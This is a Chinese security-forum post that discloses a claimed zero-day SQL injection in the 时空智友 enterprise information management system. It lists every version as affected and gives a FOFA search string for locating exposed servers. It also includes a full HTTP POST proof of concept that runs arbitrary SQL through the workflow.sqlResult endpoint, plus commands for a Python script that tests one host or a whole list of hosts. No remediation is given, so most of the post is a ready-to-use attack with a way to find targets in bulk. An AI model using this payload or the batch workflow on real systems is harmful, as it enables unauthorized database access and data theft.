安全矩阵

 找回密码
 立即注册
搜索
查看: 1221|回复: 0

【0day】时空智友企业信息管理系统 SQL注入漏洞

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-9-21 22:33:32 | 显示全部楼层 |阅读模式
【0day】时空智友企业信息管理系统 SQL注入漏洞
一、漏洞描述


时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。


二、影响范围


时空智友企业信息管理系统所有版本


三、fofa查询


body="时空智友企业信息管理"


四、POC


  1. POST /formservice?service=workflow.sqlResult HTTP/1.1
  2. Host: ip:port
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  6. Accept-Encoding: gzip, deflate
  7. Cookie: JSESSIONID=48F4377921FEFB1A3A3365AF6D0B5D5D; __qypid=
  8. DNT: 1
  9. Connection: close
  10. Upgrade-Insecure-Requests: 1
  11. Content-Type: application/x-www-form-urlencoded
  12. Content-Length: 60
复制代码


  1. {"params": {"a": "11"}, "sql": "select db_name()"}
复制代码






五、批量检测利用


单个检测利用

  1. python .\SHIKONGZHIYOU_poc.py -u http://ip:port
复制代码





SQL Server 语法参考:

  1. https://blog.csdn.net/qq_36119192/article/details/88679754
复制代码




批量检测

  1. python .\SHIKONGZHIYOU_poc.py -f filename
复制代码





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 07:27 , Processed in 0.012903 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表